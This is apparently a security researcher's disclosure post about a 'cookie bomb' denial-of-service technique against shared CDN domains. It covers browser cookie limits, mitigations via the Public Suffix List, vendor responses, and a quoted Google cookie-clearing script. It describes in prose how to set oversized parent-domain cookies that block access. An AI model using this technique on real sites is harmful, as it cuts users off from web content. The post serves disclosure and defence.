DoS attack on CDN users

Sibling domains cookie isolation got some publicity recently when GitHub moved user generated pages to github.io. The problem is not new, but many sites still ignore it. One issue that somehow escaped popular perception is that cookie isolation policy can be exploited to break sites that depend on content hosted on Content Delivery Networks.

The issue affects most CDN providers, let me use RackCDN for illustration. A malicious JavaScript embedded in an HTML file served from foo.rackcdn.com subdomain (visited directly or iframed, so its origin is foo.rackcdn.com) can set a large number of large cookies with a domain attribute set to rackcdn.com. Such cookies are then sent with all future requests to all *.rackcdn.com subdomains.

Firefox allows combined size of cookies for a domain to have 614KB, Chrome 737KB, IE 10KB. After a visit to a malicious site that iframes the cookie setting HTML from foo.rackcdn.com, each subsequent request to any subdomain of the CDN is going to carry many KB of cookies. This effectively prevents the browser from accessing any content on *.rackcdn.com. HTTP servers are configured to limit the size of HTTP headers that clients can sent. Common and reasonable limits are 4KB or 8KB. If the limit is exceeded, the offending request is rejected. In my tests I haven’t found a single server that would accept ~0.5MB worth of headers, popular responses are:

  • TCP Reset while the client is still sending.
  • HTTP error code 4XX (400, 413, 431 or 494) and TCP reset while the client is still sending.
  • HTTP error code 4XX after a request is fully transferred.

Even if CDN servers accepted such large requests, the overhead of sending the data would terribly affect performance.

A nasty thing is that a malicious site does not need to target a single CDN, the site can use iframes to include cookie setting HTML from multiple CDNs and prevent a visitor from accessing considerable part of the Internet. Note that this is not a DoS on CDN infrastructure, for which 0.5MB requests should be insignificant.

CDN level protection

To protect Firefox, Chrome and Opera users CDN providers should make sure a domain that is shared by their clients is on the Public Suffix List. If a CDN provider uses bucket.common-domain.xyz naming scheme (like for example foo.rackcdn.com), common-domain.xyz should be a public suffix. For more elaborate schemes, such as bucket.something.common-domain.xyz (for example: a248.e.akamai.net), *.common-domain.xyz should be a public suffix.

IE does not use the list, but IE limits combined size of cookies to only 10KB, CDN servers could be configured to accept such requests. The attack would still add a significant overhead to each request, but at least the requests were served. Hopefully, with issues like this exposed, IE will switch to the Public Suffix List at some point.

Web site level protection

The only things a web site that depends on a CDN can do to ensure the CDN hosted content can be accessed by users is to either choose a CDN that supports custom domains, choose a CDN that is on the Public Suffix List, or ask a CDN provider to add a shared domain to the list. A custom domain can be problematic if the site wants to retrieve content from CDN over HTTPS (a wise thing to do). While CDN services are cheap today, CDN services with custom domains and HTTPS are quite expensive.

Browser level protection

To efficiently prevent the attack, users would need to configure browsers to by default reject all cookies and allow only white-listed sites to set cookies. There are extensions that allow to do it quite conveniently. Similarly rejecting by default all JavaScript and white-listing only trusted sites fully prevents the attack.

Disabling third party cookies mitigates the problem. While a malicious site can still set a cookie bomb, it now needs to be visited directly (not iframed), and it can target only a single CDN at once. The new Firefox cookie policy, to be introduced in the release 22, should have the same effect.

Affected CDNs

All CDN providers that use a shared domain that is not on the Public Suffix List are affected. This is a long list, I’ve directly contacted four of them:

Amazon confirmed the problem and added CloudFront and S3 domains to the Public Suffix List.

RackSpace and Akamai did not respond.

Google did not confirm the issue with CloudStorage. Google deploys a JavaScript based protection mechanism that can work in some limited cases, but it my tests it never efficiently protected CloudStorage.

When Google server receives a requests with headers that are too large, it responds with HTTP error code 413 and an HTML with a script that should drop the offending cookies (white spaces added by me):

if(!location.hostname.match(/(^|\.)(google|blogger|orkut|youtube)\.com$/)) {
  var purePath=location.pathname.replace(/\/[^\/]*$/,"");
  var cookieSet=document.cookie.split(";");
  for(var cookieNum=0;cookieNum<cookieSet.length;++cookieNum){
    var name=cookieSet[cookieNum].split("=")[0];
    var host=location.hostname;
    while(1){
      var path=purePath;
      while(1){
        document.cookie = name+"=;path="+path+"/;domain="+host+
          ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
        var lastSlash=path.lastIndexOf("/");
        if(lastSlash==-1)
          break;
        path=path.slice(0, lastSlash)
      }
      var firstDot=host.indexOf(".",1);
      if(firstDot==-1)
        break;
      host=host.slice(firstDot)
    }
  }
  setTimeout("location.reload()",1E3)
};

This code loops through all cookies, and overwrites them with expired values. Because a path and a domain are parts of a cookie id, but are not exposed by browsers API, the cleaning code needs to cover all possible paths and domains (hence three loops). This works fine if the code is executed. The problem is that the HTTP server resets the connection just after returning the response, while the client is still sending the request. Browser does not interpret the response as HTTP level 413 error, but TCP level connection reset error. The servers would need to let clients send the complete request for the response to be interpreted. Another problem is that the code is executed in a context of *.commondatastorage.googleapis.com domain only when the browser requests an HTML from this domain directly or via iframe. If a browser is requesting images, scripts or css, which is most often the case with CDNs, cookie clearing JavaScript has no chances of being executed.

Other affected sites

CDNs are the most interesting targets for a DoS attack like this, but many sites can be also targeted directly. I’ve notified GitHub and DropBox, both were already working on moving user generated pages to separate domains (now the move is completed). While this protects github.com and dropbox.com, a user content can still be a subject of DoS. Similarly it is easy to cut access to Google drive hosted static pages or Tumblr.